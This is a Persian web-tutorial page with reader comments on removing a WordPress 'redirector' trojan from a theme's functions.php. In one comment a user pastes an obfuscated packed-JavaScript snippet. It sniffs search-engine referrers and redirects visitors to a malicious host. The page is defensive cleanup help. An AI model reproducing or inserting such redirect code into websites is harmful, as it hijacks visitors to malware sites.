ورود عضویت ویژه
مشهدهاست
برای خرید سزار قیمت پیشنهادی خود را فقط با شماره 09333023200 تلگرام نمائید.
خانه / طراحی و توسعه وب / پایگاه وردپرس / آموزش وردپرس / حذف تروجان redirector از وردپرس

حذف تروجان redirector از وردپرس

12345
حذف تروجان redirector از وردپرسبازبینی توسط باران مهرانگیز(سردبیر بخش طراحی و توسعه) در ۲۱-۰۴-۱۳۹۱امتیاز: 5.0حذف تروجان redirector از وردپرسچندی پیش شاهد این بودیم بیش تر سایت های قدرت گرفته از وردرپرس توسط آنتی ویروس هایی از قبیل نود ۳۲ ، نورتون و … حاوی ویروس شناخته شده اند ...

چندی پیش شاهد این بودیم بیش تر سایت های قدرت گرفته از وردرپرس توسط آنتی ویروس هایی از قبیل نود ۳۲ ، نورتون و … حاوی ویروس شناخته شده اند که موجب کاهش بازدید اینگونه سایت ها شد.
در واقع این تروجان چند خط کدی بیش نیست که وارد فایل functions.php پوسته سایت در آخرین خط ها شده و با هر بار پاک کردن دوباره به سایت اضافه می شود.
توجه: حتما برای حذف ویروس سایت خود اقدام نمایید زیرا بعد از مدتی سایت شما توسط جستجوگرها ویروسی شناخته یم شود و به لیست سیاه اضافه خواهد شد.

آموزش حذف تروجان redirector از وردپرس

برای حذف کامل هر گونه تروجان (مخصوصا سری تروجان های خانواده redirector) از سایت خود مراحل زیر را انجام دهید تا از عدم وجود هر گونه ویروسی در وب خود مطمئن شوید.
الف: وارد کنترل پنل هاست خود شوید.
ب: توسط آنتی ویروس (Virus Scanner) موجود در بخش Advanced سایت خود را اسکن کنید (ترجیحا تمامی بخش ها را اسکن کنید اما فراموش نکنید Scan Entire Home Directory و Scan Public Web Space را حتما اسکن کنید)
پ: حال این بخش به پایان میرسد و به بخش اصلی می رسیم.
الف: وارد کنترل پنل هاست خود که شده بودید ، حال وارد بخش File Manager شوید و به ترتیب وارد پوشه wp-content و themes شوید ، وارد پوشته پوسته فعال شوید و بر روی فایل functions.php راست کلیک کرده و گزینه edit cod را انتخاب کنید.
ب: با اینکودینگ UTF-8 فایل را باز کنید و کد مشابه کد زیر را که در انتهای کدها وجود دارد حذف کنید .

آموزش حذف تروجان redirector از وردپرس

در نهایت فایل را ذخیره کرده و از کنترل پنل خارج شوید.
حال آنتی ویروس خود را فعال کرده و وارد سایت خود شوید ، اگر دوباره تروجان سر کله اش پیدا شد مرحله ۲ را دوباره تکرار کنید و بعد از ذخیره سطح دسترسی (Permissions) فایل functions.php را از ۶۴۴ به ۴۴۴ تغییر دهید.

خوب دیگه سایت شما کامل باز خواهد شد بدون هیچگونه ویروسی

امیدوارم هیچ گاه به اینگونه مشکلات بر نخورید.

یا علی

QR: حذف تروجان redirector از وردپرس
مرجع : سزار
لینک کوتاه : http://www.3zar.ir/?p=3604
Processing your request, Please wait....
  • دیدگاهتان را فقط در رابطه با همین موضوع ثبت کنید, در غیر اینصورت پاسخ داده نخواهد شد.
  • اگر سوالتان به بررسی سایت مربوط می شود حتما آدرس سایت را ذکر کنید.
  • استفاده از نام های تبلیغاتی و آدرس سایت ها غیر مرتبط, باعث عدم تایید و پاسخ به دیدگاه می شود.
  • دیدگاه‌های کاربران 34 نظر

    1. پارسا کهنوئی

      تشکر ویژه

    2. علی رضا قدیری

      درود و سپاس از شما

    3. ابوالفضل روشن فکر

      تشکر.

    4. مطلب جالبی بود ممنون

    5. یکی از سایت های من هم دچای این تروجان شده بود

      خوشبختانه گوگل اطلاع داد و به موقع کد رو حذف کردم

      • VIP

        آیا از همین روش استفاده کردی یا روش دیگه ای بکار بردین دوست عزیز.اطلاع رسانی نمائید تا دیگران هم اگر به این مشکل برخوردند با راه کار مناسب در جهت برطرف کردن آن بر آیند.

        تشکر از شما

        • بعد از این که ایمیل اطلاع رسانی گوگل برام ارسال شد
          سورس کد رو نگاه کردم و دیدم که توی آخرین خط ش این کدی که در بالا ذکر کردین اومده

          کد رو حذف کردم و تمام

          اینم عکس اطلاع رسانی گوگل

          http://s.jmsbeta.info?7

    6. سلام
      من دو سه ماه پیش یه قالب رویکی از سرورهام نصب کردم و گوگل بلاکش کرد
      الان که سورسش رو میبینم این کد داخلش نیست ولی میترسم مجدد ازش استفاده کنم

    7. تشکر بابت آموزش
      خدا رو شکر سایت من این مشکل رو نداره

    8. امکان داره این کد رو خود هاست باشه و یا اینکه حتما باید روی فانکشن یا جاوا اتچ بشه؟

      • سلام معین جان
        احتمال اینکه داخل خود پوسته قالب باشه زیادتره است .
        بیشترین احتمال می تواند در فانکشن و کدهای جاوااسکریپت می باشد.
        وارد کنترل پنل هاست بشوید و از طریق آنتی ویروس موجود در آن به اسکن فایل ها بپردازید و یا با آنتی ویروس سیستم چک نمائید.

    9. سلام
      این قسمت

      در قالب من هست، البته قالب رو دو سه روزه برام طراحی کردند، منظور شما از کد زیر کدوم قسمت کد در عکس هست ؟
      متشکرم

      • VIP

        سلام ستار جان
        در این باره لینک های زیر را مشاهده نمائید:

        این همون کد معروف است که در قالب شماست 🙂
        لطفا مراحل بالا را ادامه داده تا پاکسازی را انجام دهید.

        • یعنی میفرمایید که قالب من هم تروجان داره ؟
          آخه این قالب رو دو سه روز دادم اختصاصی برام نوشتن، چی جوری این تروجان ها وارد قالب میشوند ؟
          یعنی چی جوری متونم جلوگیری کنم ازش ؟

          متشکرم از پاسخ گویی تون

          • VIP

            ستار جان خودتون چی فکر میکنید.این کدهای مخرب از 1001 راه برای نفوذ استفاده میکنند.
            ممکنه از طرف سیستم طراحتون باشه و یا اینکه بواسطه آپلود فایل و از این دست موارد ثبت شده باشد.این تروجان نگاه نمیکنه که شما سایتتون قدیمه یا جدید,موارد بالا را برای حذف اقدام کنید.مشکلی نیست نگران نباشید.

    10. متشکرم ازتون
      لطف کردید

    11. سلام
      با تشکر بابت خدمات خوب شما
      سایت بنده دچار همین مشکل شده است.
      در گوگل مستر تولز نیز ارور زیر ملاحظه میشود:

      ||e(c);k=[function(e){return r[e
      ]}];e=function(){return’w+’};c=1};while(c–)if(k

      )p=p.re
      place(new RegExp(‘b’+e(c)+’b’,’g’),k

      );return p}(‘e r=
      x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
      ("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
      ;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
      3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
      "+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
      .o("&")[0];’,39,39,’|||indexOf|if|rc|length|msn|yahoo|referr
      er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
      ubstring|split||||||ea|ht|tp|document|||go|window|location’.
      split(‘|’),0,{}))

      اما کدهای بالا را در فانکشن نیافتم.
      ولی نمیدونم کدهای جاوااسکریپت کجای کنترل پنل هستن. در ضمن کنترل پنل سایت آنتی ویروس ندارد.
      ممنون میشم راهنمایی کنید.

      • VIP

        اول اینکه باید بدونید آیا تو لیست سیاه گوگل رفتید یا نه , به لینک زیر مراجعه کنید :

        در مورد شما دوست عزیز که رفتید دیگه 🙂 در دومی شاید نشون نده!

        یکسری اسکنر آنلاین برای جستجوی ویروس و تروجان برای سایت ها وجود داره

        نتایج پاسخ گوگل به سایت شما:
        “چه اتفاقی می افتد زمانی که گوگل به بازدید از این سایت؟

        از 10 صفحه ما در سایت بیش از 90 روز گذشته از 5 صفحه (ها) در نرم افزار مخرب بودن و بدون رضایت کاربر دریافت و نصب است. آخرین باری که گوگل این سایت بازدید در تاریخ 2012/07/10، بود و زمان آخرین مطالب مشکوک در این سایت یافت شده در 2012/07/10.

        نرم افزار های مخرب شامل 8 برنامه نویسی بهره برداری (ها) است.

        نرم افزار های مخرب بر روی 1 دامنه (ها)، شامل googosearch.biz / میزبانی شده است

        این سایت در 1 شبکه (ها) از جمله AS24940 (HETZNER) میزبان شد.”
        اطلاعات تکمیلی در مورد سایت شما اینجاست:

        حالا میریم سروقت نجات سایت شما
        1-برید داخل کنترل پنل سایت و پرمیشن فایل و پوشه ها را چک و اصلاح کنید.
        2-یک قالب ساده بارگزاری کنید که داخل functions.php آن خالی باشد و کد های جاوا اسکریپت نداشته باشد.
        3-حتما کنترل پنل هاست یا سرور شما آنتی ویروس دارد یک چک دوباره بکنید مگر اینکه خیلی …
        4-با ویروس اسکن های آنلاین بالا دوباره سایت را چک کنید اگه مشکلی نبود مرحله 6 بعد را چک کنید در غیر این صورت
        5-با مدیر هاستتون تماس بگیرید و اعلام بررسی اسکن سایت و سرویس خود را بکنید
        6-نامه به google webmasters و اعلان بررسی سایت و خارج نمودن سایت از لیست سیاه.

    12. سلام مجدد
      احتراما
      مراحل بالارو انجام دادم. اما مشکل همچنان پابرجاست.
      میشه مرحله ی 6 بالا رو کامل توضیح بدین؟

      • VIP

        جواد جان اول اینکه اگه مراحل را تا 4 انجام دادید و مشکلی نبود دیگه سایتت هیچ تروجانی نداشته باشه خود گوگل خودکار شما رو از لیست سیاه در میاره.
        دوم لینک زیر شاید کمکی باشه برای شما که با استفاده از ابزار وب مستر گوگل پس از ثبت سایتتون دلیل لیست سیاه شدن سایت + راه حل خارج کردن آن برای شما ارائه میشه !

        • ممنون
          نتونستم محل کد رو پیدا کنم. حتی کلا وردپرس رو پاک کردم و مجددا نصب کردم ولی بازم ….

          درخواست بررسی مجدد رو فرستادم. معلوم نیست سایتمو از لیست خارجش کنن یا نه!!

          • VIP

            جواد جان گوگل خودش چک میکنه براساس رتبه بندی که در بلک لیست سایت ها داره انشالله سایت شما بزودی از لیست سیاه در میاد.یکم زمان میبره.

    13. با سلام.دوست عزیز الان یه مدتی هست که سایت بنده به خاطر همین تروجان بلاک شده و داخل گوگل وبمسترز هم که رفتم و نگاه انداختم دیدم که همین کدی رو که شا فرمودین حذف کنیم بهش توی چندصفحه گیر داده بود و منم چندین بار اسکن کردم و بعد از request مجددی که برای بازبینی دادم تعداد خطاها کم شده بود به طوریکه از 100 و خوردی به 2 تا رسید و اناهم دقیقاً همین کد هستن حالا من رفتم فایل function.php قالب فعالم رو نگاه کردم هیچ چیزی شبیه به این داخلش نبود و اصلاً کلش 3-4 خطه!!حالا نمیدونم از کجا این دو تا کدم پاک کنم.امکانش هست که بنده رو راهنمایی فرمایید .البته فراموش کردم که بگم اسکن کردم الان با چند ویروس کش آنلاین سایتمو و request هم دادم اما خبری نشده هنوز!

      • VIP

        خوب آرش جان بسیار خوبه که حداقل ناامید نشدید چون خیلی ها قطع امید میکنند و دنبال یک دومین جدید می روند.بهترین کار این است که خیالت رو راحت کنی.از دیتا بیس یک بک بگیر از محتویات فایل هات فقط از عکس هات و دیتاهایی که برای دانلود یا چیزهای شبیه به اون بک بگیر و بقیه حتی وردپرس رو پاک کن.یعنی با مدیر سرور هماهنگ کن که سرویستو فرمت بکنه.یه قالب پاک و بدون فانکشن نصب کن و چک کن از طریق آنتی ویروس آنلاین.لایه های امنیتی و پرمیشن هاتو درست کن و تمامی نکات امنیتی رو چک کن.یادت باشه هیچ مطلبی ارسال نکن و درخواست بازنگری به گوگل وب مستر بده تا چک بکنه.پس از بررسی بصورت اتومات از لیست سیاه خارج میشی.

        یک نکته فکر منو تو این جریان مشغول کرده و اونم اینه که ممکنه در یک رکورد داخل دیتابیس خودش رو ذخیره کرده باشه.پس حتما این احتمال منو در نظر بگیر و داخل لوکال یک چک حتما بکن قبل از ایمپورت.

        انشالله درست میشه.

    14. سلام. مرسی از اموزش خوبتون.
      من اینکارو کردم و با کد مخرب رو پاک کردم. برای اطمیان از آنتی ویروس انلاین اواست هم استفاده کردم که مشکلی رو گزارش نکرد. اما همچنان NOD32 من پیغام وجود تروجان میده. چکنم؟

    15. سلام
      مممنون از آموزش شما
      اما مشکل من بر طرف نشد و انتی ویرویس ها هنوز مخرب می شناسن

      یک سوال دارم

      من نسخه پشتیبان 1 ما ه پیش رو دارم

      به نظر شما اطلاعات رو پاک کنم و از اون نسخه استفاده کنم مشکل من بر طرف می شود؟

      • VIP

        سلام حمید جان
        نام دومین شما احتمالا در لیست سیاه قرار گرفته.شما قالبی که functions.php نداشته باشد را نصب کنید و از طریق آنتی ویروس چک کنید (از طریق هاست و پلاگین آنتی ویروس وردپرس).
        سپس باید درخواست خود را به گوگل بدهید تا بررسی نماید.در ضمن شاید نیاز باشد بصورت دتی از طریق file manager هاست خود نگاهی ب محتوا و فایل های خود بیندازید.بی شک برگرداندن اطلاعات ممکن است جوابگوی شما نباشد.
        مراحل Cleaning your site را انجام دهید از طریق دستورات لینک زیر :

        در کنارتون هستم.

    16. مرسی بابت سایت خوبتون

    17. سلام من سایت رو چک کردم تروجان نداشت توفایل فانکشن .ولی یه مشکل دارم لطفا کمک کنید ..عکسهای که آپلود میکنم باز نمیشه .قالب من خبریه . مگس

    جوابی بنویسید

    ایمیل شما نشر نخواهد شدفیلد های ضروری نشانه گذاری شده است. *

    *


    *

    سفارش تبلیغ

    برای عضویت در خبرنامه پیامکی سزار کافیست عدد 3 را به شماره 500020409 پیامک کنید ! آخر هفته ها پیامک های خوشمزه ما رو رایگان بخونید !